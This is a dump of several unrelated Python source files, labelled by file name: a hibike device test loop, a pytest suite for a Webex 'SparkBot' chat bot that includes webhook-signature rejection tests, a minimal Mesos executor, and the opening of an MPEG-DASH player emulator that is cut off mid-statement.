        self.pipe_to_child.send(["disable_all", []])

    def terminate(self):
        """
        Terminate the hibike process and clean up resources.
        """
        self.hibike_process.terminate()
        self.terminating.set()
        self.out_thread.join()
# pylint: disable=too-many-branches, too-many-statements
def run_test():
    """Exercise the first attached device forever, printing cached values.

    NOTE(review): every device branch below is a deliberate 'while True'
    loop with no break, so only the FIRST device returned by
    get_uids_and_types() is ever exercised; the for loop never advances.
    """
    comms = Hibike()
    # Give the subprocess time to enumerate devices before querying.
    time.sleep(3)
    device_info = comms.get_uids_and_types()
    for uid, device_type in device_info:
        print("Device info packet:", (uid, device_type))
        print("Type:", device_type)
        if device_type == "LimitSwitch":
            while True:
                comms.subscribe(uid, 100, ["switch0", "switch1", "switch2", "switch3"])
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, switch0 and switch1:")
                print(comms.get_last_cached(uid, "switch0"))
                print(comms.get_last_cached(uid, "switch1"))
                time.sleep(0.5)
        elif device_type == "LineFollower":
            while True:
                comms.subscribe(uid, 100, ["left", "center", "right"])
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, all params:")
                print(comms.get_last_cached(uid, "left"))
                print(comms.get_last_cached(uid, "right"))
                time.sleep(0.5)
        elif device_type == "Potentiometer":
            while True:
                comms.subscribe(uid, 100, ["pot0", "pot1", "pot2", "pot3"])
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, pot0 and pot2:")
                print(comms.get_last_cached(uid, "pot0"))
                print(comms.get_last_cached(uid, "pot1"))
                time.sleep(0.5)
        elif device_type == "Encoder":
            while True:
                comms.read(uid, ["rotation"])
                time.sleep(0.05)
                comms.read(uid, ["rotation"])
                time.sleep(0.05)
                comms.read(uid, ["rotation"])
                time.sleep(0.5)
        elif device_type == "BatteryBuzzer":
            while True:
                comms.subscribe(uid, 100, ["cell1", "cell2", "cell3", "calibrate"])
                time.sleep(0.05)
                comms.write(uid, ("calibrate", True))
                time.sleep(0.05)
                comms.write(uid, ("calibrate", False))
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, calibrate and cell2:")
                print(comms.get_last_cached(uid, "calibrate"))
                print(comms.get_last_cached(uid, "cell2"))
                time.sleep(0.5)
        elif device_type == "TeamFlag":
            while True:
                comms.subscribe(uid, 100, ["led1", "led2", "led3", "led4", "blue", "yellow"])
                time.sleep(0.05)
                comms.write(uid, [("led1", True), ("led2", True), ("led3", False),
                                  ("led4", False), ("blue", True), ("yellow", False)])
                time.sleep(0.05)
                comms.write(uid, [("led1", False), ("led2", False), ("led3", True),
                                  ("led4", True), ("blue", False), ("yellow", True)])
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, blue and yellow:")
                print(comms.get_last_cached(uid, "blue"))
                print(comms.get_last_cached(uid, "yellow"))
                time.sleep(0.5)
        elif device_type == "YogiBear":
            while True:
                comms.subscribe(uid, 100, ["duty", "forward"])
                time.sleep(0.05)
                comms.write(uid, [("duty", 100), ("forward", False)])
                time.sleep(0.05)
                comms.write(uid, [("duty", 50), ("forward", True)])
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, all params:")
                print(comms.get_last_cached(uid, "duty"))
                print(comms.get_last_cached(uid, "forward"))
                time.sleep(0.5)
        elif device_type == "ServoControl":
            while True:
                comms.subscribe(uid, 100, ["servo0", "enable0", "servo1", "enable1",
                                           "servo2", "enable2", "servo3", "enable3"])
                time.sleep(0.05)
                comms.write(uid, [("servo0", 3), ("enable0", False), ("servo1", 3),
                                  ("enable1", False), ("servo2", 3), ("enable2", True),
                                  ("servo3", 3), ("enable3", False)])
                time.sleep(0.05)
                comms.write(uid, [("servo0", 1), ("enable0", True), ("servo1", 26),
                                  ("enable1", True), ("servo2", 30), ("enable2", False),
                                  ("servo3", 17), ("enable3", True)])
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, servo1 and enable1:")
                print(comms.get_last_cached(uid, "servo1"))
                print(comms.get_last_cached(uid, "enable1"))
                time.sleep(0.5)
        elif device_type == "ExampleDevice":
            while True:
                comms.subscribe(uid, 100, ["kumiko", "hazuki", "sapphire", "reina",
                                           "asuka", "haruka", "kaori", "natsuki", "yuko",
                                           "mizore", "nozomi", "shuichi", "takuya",
                                           "riko", "aoi", "noboru"])
                time.sleep(0.05)
                comms.write(uid, [("kumiko", True), ("hazuki", 19), ("sapphire", 12),
                                  ("reina", 210), ("asuka", 105), ("haruka", 1005),
                                  ("kaori", 551), ("natsuki", 18002), ("yuko", 9001),
                                  ("mizore", 6.45), ("nozomi", 33.2875), ("takuya", 331),
                                  ("aoi", 7598)])
                time.sleep(0.05)
                comms.write(uid, [("kumiko", False), ("hazuki", 0), ("sapphire", 0),
                                  ("reina", 0), ("asuka", 0), ("haruka", 0), ("kaori", 0),
                                  ("natsuki", 0), ("yuko", 0), ("mizore", 0.0), ("nozomi", 0.0),
                                  ("takuya", 0), ("aoi", 0)])
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, kumiko and hazuki:")
                print(comms.get_last_cached(uid, "kumiko"))
                print(comms.get_last_cached(uid, "hazuki"))
                time.sleep(0.5)
        elif device_type == "RFID":
            while True:
                comms.subscribe(uid, 100, ["id", "detect_tag"])
                time.sleep(0.05)
                comms.read(uid, ["id"])
                time.sleep(0.05)
                print("Uid:", uid)
                print("Last cached, all params:")
                print(comms.get_last_cached(uid, "id"))
                print(comms.get_last_cached(uid, "detect_tag"))
                time.sleep(0.5)
        else:
            raise TypeError("ERROR: unknown device type detected")
|
test_all.py | import pytest
import subprocess
import server
from random import SystemRandom
import string
from unittest import mock
from multiprocessing import Process
from time import sleep
from sparkbot import SparkBot, receiver
from sparkbot.exceptions import CommandSetupError
from wsgiref import simple_server
import requests
from requests.exceptions import ConnectionError
from ciscosparkapi import CiscoSparkAPI
class TestAPI:
def random_bytes(self, length):
"""Returns a random bytes array with uppercase and lowercase letters, of length length"""
cryptogen = SystemRandom()
my_random_string = ''.join([cryptogen.choice(string.ascii_letters) for _ in range(length)])
my_random_bytes = my_random_string.encode(encoding='utf_8')
return my_random_bytes
    @pytest.fixture(scope="session")
    def emulator_prereqs(self):
        """ Ensures that the WebEx API emulator can be run """
        # Make sure we can start node; the emulator is a node.js app.
        try:
            subprocess.run("node -v", shell=True, check=True)
        except subprocess.CalledProcessError:
            pytest.fail("Unable to execute Node. I won't be able to test the bot. Please install node.js and try again.")
        return True
    @pytest.fixture(scope="session")
    def emulator_server_zip(self, tmpdir_factory, emulator_prereqs):
        """ Returns a zipfile.ZipFile containing an installed emulator server.

        Downloads the emulator source, runs `npm install` in it, then
        re-archives the installed tree under .testcache so later sessions
        can reuse it.
        """
        from subprocess import CalledProcessError
        import zipfile
        import shutil
        from urllib.request import urlretrieve
        import os
        tmpdir = tmpdir_factory.mktemp("emulator")
        fresh_emulator_zip = ".testcache/webex-api-emulator-fresh.zip"
        fresh_emulator_zip_extract_dir = tmpdir.join("webex-api-emulator")
        installed_emulator_zip_filename = ".testcache/webex-api-emulator-installed"
        try:
            os.mkdir(".testcache")
        except FileExistsError:
            pass
        urlretrieve("https://github.com/webex/webex-api-emulator/archive/master.zip", fresh_emulator_zip)
        with zipfile.ZipFile(fresh_emulator_zip) as myzip:
            # The archive's first entry is its top-level directory name.
            first_member = myzip.namelist()[0]
            myzip.extractall(path=str(fresh_emulator_zip_extract_dir))
        built_server_directory = fresh_emulator_zip_extract_dir.join(first_member)
        print("Building zip")
        try:
            subprocess.run(["npm install"], shell=True, check=True, cwd=str(built_server_directory))
        except CalledProcessError:
            pytest.fail("Failed to run `npm install`. Try again in a few seconds, then try deleting the '.testcache' folder.")
        # Pack the installed files into a new zip
        installed_emulator_zip = shutil.make_archive(installed_emulator_zip_filename,
                                                     "zip",
                                                     str(built_server_directory))
        newzip_read = zipfile.ZipFile(installed_emulator_zip)
        yield newzip_read
        newzip_read.close()
    @pytest.fixture
    def emulator_server_files(self, tmpdir, emulator_server_zip):
        """ Returns a path to a WebEx API emulator in temporary storage as a `py._path.local`_

        .. _py._path.local:https://py.readthedocs.io/en/latest/path.html#py._path.local.LocalPath
        """
        emulator_server_zip.extractall(path=str(tmpdir))
        # Python 3.6+ had a behavior change for zip files. Zipfiles created on
        # 3.5 have `webex-api-emulator-master` as their first component. 3.6+
        # zipfiles do not have this, so only prepend it when present.
        zip_component = ""
        if emulator_server_zip.namelist()[0] == "webex-api-emulator-master/":
            zip_component = "webex-api-emulator-master/"
        return tmpdir.join(zip_component)
    @pytest.fixture(scope="session")
    def unique_port(self, ):
        """ Returns a generator that counts up, used for port numbers for the emulator server.

        To use this counter, use 'unique_port.__next__()'
        (session-scoped so ports are never reused within one test run)
        """
        from itertools import count
        return count(start=10001)
    @pytest.fixture
    def emulator_server(self, emulator_server_files, unique_port):
        """ Starts up and returns a WebEx API emulator as a server.WebexAPIEmulator,
        stopping it again at teardown. """
        port = unique_port.__next__()
        emulator = server.WebexAPIEmulator(emulator_server_files, port)
        emulator.start()
        yield emulator
        emulator.stop()
    def get_spark_api(self, server):
        """
        Returns a ciscosparkapi.CiscoSparkAPI object for the server.WebexAPIEmulator
        specified by 'server', authenticated with the emulator's bot token.
        """
        return CiscoSparkAPI(base_url=server.url, access_token=server.bot_token)
    @pytest.fixture
    def full_bot_setup(self, emulator_server, unique_port):
        """ Sets up everything needed to test a bot, including a set-up webhook and receiver.

        To use this fixture, first run ``full_bot_setup["receiver_process"].start()`` to run the
        receiver AFTER you have added commands to the bot. Next, ``GET receiver_webhook_url`` to
        prevent a race condition between the server startup and your test. Then, use
        ``self.invoke_bot()`` or your preferred method to get a response from the bot.

        :returns: Dict with the format
            {
            "bot": sparkbot.SparkBot,
            "receiver": sparkbot.receiver,
            "bot_api": ciscosparkapi.CiscoSparkAPI,
            "aux_api": ciscosparkapi.CiscoSparkAPI,
            "emulator": server.WebexAPIEmulator,
            "receiver_process": subprocessing.Process,
            "receiver_webhook_url": str
            }

        ``aux_api`` is a second Spark API set up for the given emulator.
        """
        from logging import getLogger
        return_items = {}
        return_items["bot_api"] = self.get_spark_api(emulator_server)
        receiver_port = unique_port.__next__()
        return_items["receiver_webhook_url"] = "http://127.0.0.1:" + str(receiver_port)
        return_items["aux_api"] = CiscoSparkAPI(base_url=emulator_server.url,
                                                access_token="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ")
        return_items["bot"] = SparkBot(return_items["bot_api"],
                                       root_url = return_items["receiver_webhook_url"],
                                       logger = getLogger(name="Bot"))
        # Shared secret used by Spark to sign webhook payloads.
        secret = self.random_bytes(32)
        return_items["receiver"] = receiver.create(return_items["bot"])
        return_items["emulator"] = emulator_server
        return_items["bot_api"].webhooks.create("myBot",
                                                return_items["receiver_webhook_url"],
                                                "messages",
                                                "created",
                                                secret=secret.decode())
        receiver_server = simple_server.make_server("localhost",
                                                    receiver_port,
                                                    return_items["receiver"])
        # The process is created but NOT started here; see docstring/start_receiver.
        receiver_process = Process(target=receiver_server.serve_forever)
        return_items["receiver_process"] = receiver_process
        yield return_items
        receiver_process.terminate()
        receiver_process.join()
    def start_receiver(self, receiver_process, url):
        """ Starts the receiver held by receiver_process and waits for it to come up.

        receiver_process should be a multiprocessing.Process, its target should be receiver.run().
        url is the receiver URL that this method will expect to be able to reach when the receiver
        is up.
        NOTE(review): this polls forever — if the receiver never comes up the
        test hangs rather than failing with a timeout.
        """
        # It would be simpler to start the server in the full_bot_setup fixture, but that isn't
        # possible due to the way that Python multiprocessing works. Specifically, trying to add
        # new commands to the bot after starting a receiver will always fail since the process
        # "holds" the old version of the bot.
        receiver_process.start()
        while True:
            try:
                r = requests.get(url)
                print(r.status_code)
                break
            except ConnectionError:
                pass
def invoke_bot(self, spark_api, bot_id, bot_displayname, markdown, room_name="Test", expected_replies=1, timeout=10):
""" Creates a new room, adds the bot, and messages the bot using the markdown specified.
:param spark_api: ciscosparkapi.CiscoSparkAPI of another user (not the bot we're testing)
:param bot_id: ID of the bot that we are invoking
:param bot_displayname: Display name of the bot that we are invoking
:param markdown: markdown-formatted message to send to the bot
:param room_name: The name of the room to create. Must be provided unique within each test.
Failure to provide a unique name will cause unexpected results.
:param expected_replies: The number of replies to wait for from the bot
:param timeout: Maximum number of seconds to wait for the bot to respond.
:returns: Response from bot as a ciscosparkapi.Message if ``expected_replies`` is 1,
list of responses from bot if it is greater than 1.
"""
message = "<@personId:{}|{}> ".format(bot_id, bot_displayname) + markdown
room = spark_api.rooms.create(room_name)
spark_api.memberships.create(roomId=room.id, personId=bot_id)
spark_api.messages.create(roomId=room.id, markdown=message)
sleep(1)
bot_replies = []
# Timeout*2 because we're sleeping for 0.5 seconds and incrementing i by 1 each time
for i in range(0, timeout*2):
# Pull each message from the test room. If we match one that's already in bot_replies,
# go on to the next one. Otherwise, if the reply came from the bot, store it.
for message in spark_api.messages.list(room.id):
if message.personId == bot_id and not message.id in [stored_message.id for stored_message in bot_replies]:
bot_replies.append(message)
next
if len(bot_replies) == expected_replies or i >= timeout:
break
else:
sleep(0.5)
# Order the replies by their send time
bot_replies.sort(key=lambda r: r.created)
if expected_replies == 1:
return bot_replies[0]
else:
return bot_replies
    def test_server_sanity(self, emulator_server):
        """Ensures the API server is sane: /people/me must echo back every
        identity field the emulator was configured with."""
        spark_api = self.get_spark_api(emulator_server)
        me = spark_api.people.me()
        assert me.displayName == emulator_server.bot_displayname
        assert me.lastName == emulator_server.bot_lastname
        assert me.firstName == emulator_server.bot_firstname
        assert me.orgId == emulator_server.bot_org
        assert me.nickName == emulator_server.bot_nickname
        assert me.emails == emulator_server.bot_emails
        assert me.id == emulator_server.bot_id
    def test_add_command(self, emulator_server):
        """Tests use of the @SparkBot.command() decorator to add a command to the bot"""
        from sparkbot import SparkBot
        spark_api = self.get_spark_api(emulator_server)
        bot = SparkBot(spark_api)

        @bot.command("ping")
        def ping(caller, room_id):
            return 'pong'

        # The decorator must register the function under bot.commands["ping"].
        assert bot.commands["ping"].execute() == "pong"
def test_callback(self, emulator_server):
"""Tests the bot's ability to give a callback function"""
spark_api = self.get_spark_api(emulator_server)
bot = SparkBot(spark_api)
room_id = "ASDF1234"
temp_respond = mock.MagicMock()
@bot.command("callback")
def callingback(callback):
callback("Some markdown")
bot.commands["callback"].execute(room_id=room_id, callback=temp_respond)
assert temp_respond.called_with(room_id, "Some markdown")
def test_full_nocommand(self, full_bot_setup):
    """An unregistered command should produce a 'Command not found' reply."""
    emulator = full_bot_setup["emulator"]
    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    reply = self.invoke_bot(full_bot_setup["aux_api"],
                            emulator.bot_id,
                            emulator.bot_displayname,
                            "ping")
    assert "Command not found" in reply.text
def test_full_ping(self, full_bot_setup):
    """A registered ping command answers 'pong' end to end through the emulator."""
    bot = full_bot_setup["bot"]
    emulator = full_bot_setup["emulator"]

    @bot.command("ping")
    def ping():
        return "pong"

    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    reply = self.invoke_bot(full_bot_setup["aux_api"],
                            emulator.bot_id,
                            emulator.bot_displayname,
                            "ping")
    assert "pong" in reply.text
def test_full_bad_formatting(self, full_bot_setup):
    """A command with an unbalanced quote returns a formatting error safely."""
    emulator = full_bot_setup["emulator"]
    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    # Hit the receiver endpoint once so we know the server is up.
    requests.get(full_bot_setup["receiver_webhook_url"])
    reply = self.invoke_bot(full_bot_setup["aux_api"],
                            emulator.bot_id,
                            emulator.bot_displayname,
                            "Command 'without completed quotes")
    assert "format" in reply.text
def test_command_strings_list(self, full_bot_setup):
    """A command registered under several names answers to each of them."""
    bot = full_bot_setup["bot"]
    aux_api = full_bot_setup["aux_api"]
    emulator = full_bot_setup["emulator"]

    @bot.command(["ping", "ding"])
    def ping():
        return "pong"

    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    # Invoke each alias in its own room; both must yield the same answer.
    for name, room in (("ping", "test1"), ("ding", "test2")):
        reply = self.invoke_bot(aux_api,
                                emulator.bot_id,
                                emulator.bot_displayname,
                                name,
                                room_name=room)
        assert "pong" in reply.text
def test_full_help(self, full_bot_setup):
    """Tests the default help-all command (and the default help command's ability to call it)"""
    aux_api = full_bot_setup["aux_api"]
    emulator = full_bot_setup["emulator"]
    self.start_receiver(full_bot_setup["receiver_process"], full_bot_setup["receiver_webhook_url"])
    # Plain "help" (no arguments)...
    bot_reply_1 = self.invoke_bot(aux_api,
                                  emulator.bot_id,
                                  emulator.bot_displayname,
                                  "help",
                                  room_name="test1")
    # ...and explicit "help all" should both list every command.
    bot_reply_2 = self.invoke_bot(aux_api,
                                  emulator.bot_id,
                                  emulator.bot_displayname,
                                  "help all",
                                  room_name="test3")
    # The expected markdown literal is indentation-sensitive: the "- help"
    # entry must start at column 0 inside the string.
    assert bot_reply_1.markdown == (
        """Type `help [command]` for more specific help about any of these commands:
- help"""
    )
    # Both invocation forms must produce identical output.
    assert bot_reply_1.markdown == bot_reply_2.markdown
def test_full_internal_error_text(self, full_bot_setup):
    """A command raising ValueError with extra error text reports that text."""
    bot = full_bot_setup["bot"]
    emulator = full_bot_setup["emulator"]

    @bot.command("exception")
    def cause_exception():
        raise ValueError("Whoops", "Hey, an exception")

    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    reply = self.invoke_bot(full_bot_setup["aux_api"],
                            emulator.bot_id,
                            emulator.bot_displayname,
                            "exception",
                            room_name="test1")
    assert reply.text == "⚠️ Error: Hey, an exception"
def test_full_internal_error(self, full_bot_setup):
    """A command raising ValueError without error text gets the generic message."""
    bot = full_bot_setup["bot"]
    emulator = full_bot_setup["emulator"]

    @bot.command("exception")
    def cause_exception():
        raise ValueError("Whoops")

    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    reply = self.invoke_bot(full_bot_setup["aux_api"],
                            emulator.bot_id,
                            emulator.bot_displayname,
                            "exception",
                            room_name="test1")
    assert reply.text == "⚠️ Error: Something happened internally. For more information, contact the bot author."
def test_full_yield_results(self, full_bot_setup):
    """A generator command (two yields) produces two separate replies, in order."""
    bot = full_bot_setup["bot"]
    emulator = full_bot_setup["emulator"]

    # The (unused) callback parameter is kept exactly as in the original
    # registration; the command relies solely on its yields.
    @bot.command("two-replies")
    def two_replies(callback):
        yield "Reply 1!"
        yield "Reply 2!"

    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    replies = self.invoke_bot(full_bot_setup["aux_api"],
                              emulator.bot_id,
                              emulator.bot_displayname,
                              "two-replies",
                              expected_replies=2,
                              room_name="test1")
    assert [reply.text for reply in replies] == ["Reply 1!", "Reply 2!"]
def test_full_fallback(self, full_bot_setup):
    """With a fallback command registered, unknown commands route to it."""
    bot = full_bot_setup["bot"]
    emulator = full_bot_setup["emulator"]

    @bot.command(fallback=True)
    def fallback():
        return "This is the fallback command"

    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    # "exception" is not registered, so the fallback must answer.
    reply = self.invoke_bot(full_bot_setup["aux_api"],
                            emulator.bot_id,
                            emulator.bot_displayname,
                            "exception",
                            room_name="test1")
    assert reply.text == "This is the fallback command"
def test_full_remove_help(self, full_bot_setup):
    """After remove_help(), asking for help is treated as an unknown command."""
    bot = full_bot_setup["bot"]
    emulator = full_bot_setup["emulator"]
    bot.remove_help()
    self.start_receiver(full_bot_setup["receiver_process"],
                        full_bot_setup["receiver_webhook_url"])
    reply = self.invoke_bot(full_bot_setup["aux_api"],
                            emulator.bot_id,
                            emulator.bot_displayname,
                            "help",
                            room_name="test1")
    assert reply.text == "⚠️ Error: Command not found."
def test_help_multiple_command_names(self, emulator_server):
    """Tests the default help command's ability to group commands"""
    # Since we've already tested help and help_all with the full setup, we
    # only need to call the function on the bot directly.
    spark_api = self.get_spark_api(emulator_server)
    bot = SparkBot(spark_api)
    # One command registered under two names, one under a single name.
    @bot.command(["name1", "name2"])
    def multiple_names():
        pass
    @bot.command("z")
    def z_command():
        pass
    bot_reply = bot.my_help_all()
    # Multi-name commands appear once with names comma-separated.  The expected
    # literal is indentation-sensitive: each "- " entry starts at column 0.
    assert bot_reply == (
        """Type `help [command]` for more specific help about any of these commands:
- help
- name1, name2
- z"""
    )
def test_fallback_failure_on_multiple(self, emulator_server):
    """Registering a second fallback command must raise CommandSetupError."""
    bot = SparkBot(self.get_spark_api(emulator_server))

    @bot.command(fallback=True)
    def fallback():
        return "This is the fallback command"

    # A second fallback registration is rejected.
    with pytest.raises(CommandSetupError):
        @bot.command(fallback=True)
        def second_fallback():
            return "This isn't going to work."
def test_receiver_incorrect_hmac(self, emulator_server, unique_port):
    """Tests that the receiver will reject a message with an incorrect signature"""
    spark_api = self.get_spark_api(emulator_server)
    bot = SparkBot(spark_api)
    receiver_port = unique_port.__next__()
    webhook_url = ''.join(["http://127.0.0.1:", str(receiver_port), "/sparkbot"])
    # Give the receiver an incorrect key
    bot.webhook_secret = b"1234"
    my_receiver = receiver.create(bot)
    # Now, start the receiver in another process...
    receiver_server = simple_server.make_server("localhost",
                                                receiver_port,
                                                my_receiver)
    receiver_process = Process(target=receiver_server.serve_forever)
    self.start_receiver(receiver_process, webhook_url)
    try:
        # Send a good request to the server with a junk signature.
        # The payload is a well-formed webhook body; only the signature
        # header below is invalid.
        payload = {
            "id": "Y2lzY29zcGFyazovL3VzL1dFQkhPT0svZjRlNjA1NjAtNjYwMi00ZmIwLWEyNWEtOTQ5ODgxNjA5NDk3",
            "name": "New message in 'Project Unicorn' room",
            "resource": "messages",
            "event": "created",
            "filter": "roomId=Y2lzY29zcGFyazovL3VzL1JPT00vYmJjZWIxYWQtNDNmMS0zYjU4LTkxNDctZjE0YmIwYzRkMTU0",
            "orgId": "OTZhYmMyYWEtM2RjYy0xMWU1LWExNTItZmUzNDgxOWNkYzlh",
            "createdBy": "Y2lzY29zcGFyazovL3VzL1BFT1BMRS9mNWIzNjE4Ny1jOGRkLTQ3MjctOGIyZi1mOWM0NDdmMjkwNDY",
            "appId": "Y2lzY29zcGFyazovL3VzL0FQUExJQ0FUSU9OL0MyNzljYjMwYzAyOTE4MGJiNGJkYWViYjA2MWI3OTY1Y2RhMzliNjAyOTdjODUwM2YyNjZhYmY2NmM5OTllYzFm",
            "ownedBy": "creator",
            "status": "active",
            "actorId": "Y2lzY29zcGFyazovL3VzL1BFT1BMRS9mNWIzNjE4Ny1jOGRkLTQ3MjctOGIyZi1mOWM0NDdmMjkwNDY",
            "data":{
                "id": "Y2lzY29zcGFyazovL3VzL01FU1NBR0UvOTJkYjNiZTAtNDNiZC0xMWU2LThhZTktZGQ1YjNkZmM1NjVk",
                "roomId": "Y2lzY29zcGFyazovL3VzL1JPT00vYmJjZWIxYWQtNDNmMS0zYjU4LTkxNDctZjE0YmIwYzRkMTU0",
                "personId": "Y2lzY29zcGFyazovL3VzL1BFT1BMRS9mNWIzNjE4Ny1jOGRkLTQ3MjctOGIyZi1mOWM0NDdmMjkwNDY",
                "personEmail": "matt@example.com",
                "created": "2015-10-18T14:26:16.000Z"
            }
        }
        r = requests.post(webhook_url, json=payload, headers={"x-spark-signature":"asdf1234"})
    finally:
        # Always tear the receiver process down, whether the POST succeeded or not.
        receiver_process.terminate()
        receiver_process.join()
    # 403 Forbidden: the signature did not match the receiver's webhook secret.
    assert r.status_code == 403
def test_receiver_junk_data(self, emulator_server, unique_port):
    """Tests that the receiver will reject an incorrectly crafted message.

    Starts a real receiver in a subprocess, POSTs an empty (bodyless)
    request to it, and expects HTTP 400.
    """
    spark_api = self.get_spark_api(emulator_server)
    bot = SparkBot(spark_api)
    receiver_port = unique_port.__next__()
    # CONSISTENCY FIX: build the URL from three joined parts exactly like
    # test_receiver_incorrect_hmac does, instead of mixing ''.join with '+'.
    webhook_url = ''.join(["http://127.0.0.1:", str(receiver_port), "/sparkbot"])
    # Give the receiver an incorrect key
    bot.webhook_secret = b"1234"
    my_receiver = receiver.create(bot)
    # Now, start the receiver in another process...
    receiver_server = simple_server.make_server("localhost",
                                                receiver_port,
                                                my_receiver)
    receiver_process = Process(target=receiver_server.serve_forever)
    self.start_receiver(receiver_process, webhook_url)
    try:
        # Send nothing: no JSON body, no signature header.
        r = requests.post(webhook_url)
    finally:
        # Always tear the receiver process down, whether the POST succeeded or not.
        receiver_process.terminate()
        receiver_process.join()
    # 400 Bad Request: the receiver could not parse the (missing) payload.
    assert r.status_code == 400
def test_incorrect_init(self, emulator_server):
    """SparkBot rejects a non-API first argument and a non-logger `logger`."""
    spark_api = self.get_spark_api(emulator_server)
    bad_calls = (
        (("This is not a CiscoSparkAPI",), {}),
        ((spark_api,), {"logger": "This is not a logger"}),
    )
    for args, kwargs in bad_calls:
        with pytest.raises(TypeError):
            SparkBot(*args, **kwargs)
def test_bad_command_strings(self, emulator_server):
    """An empty command string is rejected with CommandSetupError."""
    bot = SparkBot(self.get_spark_api(emulator_server))
    with pytest.raises(CommandSetupError):
        @bot.command("")
        def ping():
            return "pong"
def test_bad_decorator_call(self, emulator_server):
    """Using @bot.command without calling it raises CommandSetupError."""
    bot = SparkBot(self.get_spark_api(emulator_server))
    with pytest.raises(CommandSetupError):
        @bot.command
        def ping():
            return "pong"
def test_bad_decorator_type(self, emulator_server):
    """A non-string command name is rejected with TypeError."""
    bot = SparkBot(self.get_spark_api(emulator_server))
    with pytest.raises(TypeError):
        @bot.command(bot)
        def ping(bot):
            return "pong"
def test_bad_decorator_embedded_type(self, emulator_server):
    """A non-string element inside a command-name list is rejected with TypeError."""
    bot = SparkBot(self.get_spark_api(emulator_server))
    with pytest.raises(TypeError):
        @bot.command([bot, "stuff"])
        def ping():
            return "pong"
|
executor-minimal.py | #!/usr/bin/env python2.7
from __future__ import print_function
import site
site.addsitedir('/usr/lib/python2.7/site-packages')
site.addsitedir('/usr/local/lib/python2.7/site-packages')
import sys
import time
from threading import Thread
from mesos.interface import Executor, mesos_pb2
from mesos.native import MesosExecutorDriver
class MinimalExecutor(Executor):
    """Mesos executor that reports a task running, prints its payload,
    sleeps 30 seconds, and then reports it finished."""

    def launchTask(self, driver, task):
        """Run the task on a background thread so the driver loop stays responsive."""
        def send_state(state):
            # Build and send one TaskStatus update for this task.
            status = mesos_pb2.TaskStatus()
            status.task_id.value = task.task_id.value
            status.state = state
            driver.sendStatusUpdate(status)

        def run_task():
            send_state(mesos_pb2.TASK_RUNNING)
            print(task.data)
            time.sleep(30)
            send_state(mesos_pb2.TASK_FINISHED)

        Thread(target=run_task, args=()).start()
if __name__ == '__main__':
    # Hand control to the Mesos executor driver; exit 0 only on a clean stop.
    driver = MesosExecutorDriver(MinimalExecutor())
    sys.exit(0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1)
|
player.py | #!/usr/bin/env python2.7
"""Experimental MPEG-DASH player emulator."""
import os
import requests
import shutil
import signal
import threading
import time
import scootplayer.bandwidth as bandwidth
import scootplayer.queue as queue
import scootplayer.remote as remote
import scootplayer.reporter as reporter
import scootplayer.representations as representations
import scootplayer.watchdog as watchdog
import scootplayer.progressbar as progressbar
class Player(object):
    """Main player which facilitates interaction between the other modules."""

    # NOTE(review): these are class-level attributes shared by all instances;
    # the player is used as a singleton, but `threads` and `managed_objects`
    # would be shared if more than one Player were ever created.
    bandwidth = None
    managed_objects = {'download': None,
                       'playback': None,
                       'playlist': None,
                       'representations': None,
                       'reporter': None,
                       'watchdog': None,
                       'remote_control': None}
    session = None
    threads = list()
    progress_bar = None
    state = 'stop'
    directory = ''
    current_manifest = ''

    def __init__(self, options):
        """Initialise the player and start playback."""
        self.options = options
        self._setup_signal_handling()
        self.managed_objects['remote_control'] = remote.RemoteControl(
            self, options)
        self.managed_objects['playlist'] = queue.playlist.PlaylistQueue(
            player=self, options=options)
        self.next()
        self._consumer()  # blocks: runs the main download loop

    def next(self):
        """Move onto the next item in the playlist, resetting everything."""
        if self.managed_objects['playlist'].empty():
            self.event('empty', 'playlist')
            self.exit()
        self._directory_setup()
        self.managed_objects['reporter'] = reporter.Reporter(self)
        self.event('next', 'playing item')
        self.pause()
        # Fresh HTTP session with a bounded connection pool and retry policy.
        self.session = requests.Session()
        adapter = requests.adapters.HTTPAdapter(
            pool_connections=int(self.options.conn_pool),
            pool_maxsize=int(self.options.conn_pool),
            max_retries=int(self.options.max_retries))
        self.session.mount('http://', adapter)
        self.bandwidth = bandwidth.Bandwidth()
        self.current_manifest = self.managed_objects['playlist'].get()
        self.managed_objects['representations'] = \
            representations.Representations(self, self.current_manifest)
        window_size = self.max_seg_duration() * int(
            self.options.window_multiplier)
        self.managed_objects['download'] = queue.download.DownloadQueue(
            player=self, time_buffer_max=int(self.options.max_download_queue),
            window_size=window_size)
        self.managed_objects['playback'] = queue.playback.PlaybackQueue(
            player=self, time_buffer_min=int(
                self.managed_objects['representations'].min_buffer),
            time_buffer_max=int(self.options.max_playback_queue),
            window_size=window_size)
        self.progress_bar = self._create_progress_bar()
        if self.options.watchdog:
            self.managed_objects['watchdog'] = watchdog.Watchdog(self)
        self._setup_scheduled_stop(self.options.playback_time)
        self.resume()

    def _directory_setup(self):
        """Create directory for storing downloads."""
        time_now = str(int(time.time()))
        # Output lives two levels above this file, under <output>/<epoch>.
        self.directory = '/'.join(__file__.split('/')
                                  [:-2]) + '/' + self.options.output + \
            '/' + time_now
        self.create_directory()

    def _consumer(self):
        """
        Fetch a representation matching the current bandwidth. Add this to the
        download queue.

        If the player is not playing, wait briefly before checking again
        whether playback has resumed.
        """
        while True:
            self.progress_bar.next(0)
            if self.state == 'play':
                representation = self.managed_objects['representations'] \
